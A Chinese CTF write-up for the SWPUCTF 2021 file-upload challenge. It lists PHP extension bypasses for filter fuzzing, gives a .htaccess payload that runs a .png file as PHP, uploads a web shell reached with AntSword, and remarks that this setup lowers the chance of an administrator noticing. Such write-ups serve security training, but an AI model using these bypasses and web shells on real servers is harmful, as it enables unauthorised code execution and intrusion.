[SWPUCTF 2021 新生赛]easyupload3.0

[SWPUCTF 2021 新生赛]easyupload3.0 wp

信息搜集

进入页面:

[SWPUCTF 2021 新生赛]easyupload3.0_第1张图片

看到提示了吗,没看到也没关系,分享一个文件给大家,用来测试 PHP 文件上传可好用了。

php 后缀名绕过.txt:

php
php2
php3
php4
php5
php6
php7
phps
phps
pht
phtm
phtml
pgif
shtml
htaccess
phar
inc
hphp
ctp
module
php%20
php%0a
php%00
php%0d%0a
php/
php.
file.png.php
png.pHp5
php#.png
php%00.png
php\x00.png
php%0a.png
php%0d%0a.png
phpJunk123png
png.jpg.php
php%00.png%00.jpg

测试后缀名

先写个马 eval.png :

BM

关于这个马的解释可以去看我的另一篇文章:

[极客大挑战 2019]Upload wp

抓包,送到 burp 的 intruder 模块,导入文件,攻击:

[SWPUCTF 2021 新生赛]easyupload3.0_第2张图片

当看到 htaccess 后缀名没被过滤的时候,我就有想法了。

上传 .htaccess 文件

可以参考:

web配置文件.htaccess详解

.htaccess 文件是 Apache 的配置文件(注意文件名必须一模一样),其中可以设置一些规则,使得与 .htaccess 文件同目录的文件被当作 PHP 代码执行。

我们将要上传的 .htaccess 文件内容为:


SetHandler application/x-httpd-php
AddHandler php5-script .png

这段代码的作用,就是使得与 .htaccess 同目录下的名为 eval.png 的文件被当成 PHP 代码执行。只设置一个文件,可以避免其他文件被误操作,当成 PHP 代码执行,在渗透测试过程中也可以减少被管理员发现的风险,是一个良好的习惯。

将此文件上传以后,再上传一个名为 eval.png 的文件,文件内容上面已经给出。

蚁剑连接

上传成功后会给出文件的路径,直接用蚁剑连接 eval.png 所在的路径即可。

http://node4.anna.nssctf.cn:xxxxx/upload/eval.png

/var/www/html/flag.php 文件中发现 flag :

[SWPUCTF 2021 新生赛]easyupload3.0_第3张图片

你可能感兴趣的:(ctf,web安全,php,网络安全)